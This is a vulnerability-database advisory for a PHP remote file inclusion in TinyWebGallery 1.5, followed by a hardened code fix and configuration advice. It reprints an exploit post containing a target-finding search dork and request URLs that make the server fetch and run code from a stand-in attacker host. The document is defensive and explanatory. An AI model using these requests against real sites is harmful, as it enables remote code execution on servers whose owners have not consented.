TinyWebGallery 'image.php and image.php2' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1110787    Type: Unknown
Published: 2006-08-09    Updated: 2006-08-16
CVE: CVE-2006-4166    CNNVD-ID: CNNVD-200608-250
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2158
https://www.securityfocus.com/bid/83231
https://cxsecurity.com/issue/WLB-2006080102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-250
|Details
TinyWebGallery 1.5 and earlier contain a PHP remote file inclusion vulnerability. The image parameter of (1) the image.php script and (2) the image.php2 script is concatenated with ".txt" and passed to include() without validation (see the code excerpt in the exploit below), so a remote attacker who submits a URL in that parameter can make the server fetch and execute arbitrary PHP code. The excerpt shows $image being used without an assignment from $_GET, consistent with the scripts relying on register_globals to populate it from the request.
|Exploit
####################################################
#                                                  #
#                                                  #
#           C Y B E R - W A R R i O R   T I M      #
#                                                  #
#                                                  #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
// $image is taken straight from the request (register_globals); a URL supplied
// here is fetched and executed by include(), the appended ".txt" notwithstanding.
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

###########################################################################
#                                                                         #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends  #
#                                                                         #
###########################################################################

# milw0rm.com [2006-08-09]
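The vulnerable line in the excerpt above concatenates the request-supplied image value with ".txt" and hands the result to include(). With register_globals on and PHP permitted to include URLs, a value such as http://evil_scripts? makes the interpreter fetch the remote file and run it as PHP; the trailing ? turns the appended ".txt" into a query string so it no longer affects the fetched path. Below is an added example, written for this page and not TinyWebGallery's own code nor the exploit author's, showing a hardened replacement for that line. It assumes PHP 7 or later, that the caption .txt files live in a captions/ directory next to the script and contain plain text rendered into an HTML page; the CAPTION_DIR constant and the captionPath() function are names introduced here.

```php
<?php
// Added example, not TinyWebGallery's code. Hardened replacement for the
// vulnerable line  include($image . ".txt");  from the exploit excerpt.
// Assumption: caption .txt files live in a captions/ directory beside this
// script and contain plain text that is rendered into an HTML page.
declare(strict_types=1);

const CAPTION_DIR = __DIR__ . '/captions';   // assumed location (name introduced here)

/**
 * Map a request-supplied image name to a caption file inside CAPTION_DIR.
 * Returns null for anything that is not a plain file name or that does not
 * resolve to an existing file under that directory.
 */
function captionPath(string $image): ?string
{
    // Allow only a bare file name: no "/", "\", NUL, ":" or leading ".",
    // so "http://evil/x", "../../etc/passwd" and "x\0" are all rejected.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $image)) {
        return null;
    }

    $base = realpath(CAPTION_DIR);
    $real = realpath(CAPTION_DIR . '/' . $image . '.txt');
    if ($base === false || $real === false) {
        return null;   // directory missing or no such caption file
    }
    // realpath() has resolved symlinks and "..": insist the result is still under $base.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Read the parameter explicitly instead of relying on register_globals.
$image = $_GET['image'] ?? '';
$path  = captionPath($image);
if ($path === null) {
    http_response_code(404);
    exit('unknown image');
}

// Treat the caption as data: read it and escape it for HTML. The original
// include() would have compiled and run any PHP it contained, local or remote.
echo htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
```

Independently of the code fix, the remote half of the attack is closed at the interpreter level by allow_url_include = Off (a setting separate from allow_url_fopen since PHP 5.2.0, and off by default), and the unset-variable half by register_globals = Off (off by default since PHP 4.2 and removed in PHP 5.4). Neither setting protects against a local file inclusion through the same line, which is why the name check and the realpath() containment test above are still needed.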
|Affected products
TinyWebGallery 1.5, 1.4, 1.3
|References

Source: XF
Name: tinywebgallery-image-file-include(28317)
Link: http://xforce.iss.net/xforce/xfdb/28317
Source: BUGTRAQ
Name: 20060816 Re: TinyWebGallery v1.5 (image) Remote Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443353/100/0/threaded
Source: BUGTRAQ
Name: 20060810 TinyWebGallery v1.5 (image) Remote Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/442818/100/0/threaded
Source: MILW0RM
Name: 2158
Link: http://www.milw0rm.com/exploits/2158
Source: SECTRACK
Name: 1016682
Link: http://securitytracker.com/id?1016682
Source: BUGTRAQ
Name: 20060904 Re: TinyWebGallery v1.5 (image) Remote Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/445089/100/0/threaded
Source: SREASON
Name: 1393
Link: http://securityreason.com/securityalert/1393
Source: MILW0RM
Name: 2158
Link: http://milw0rm.com/exploits/2158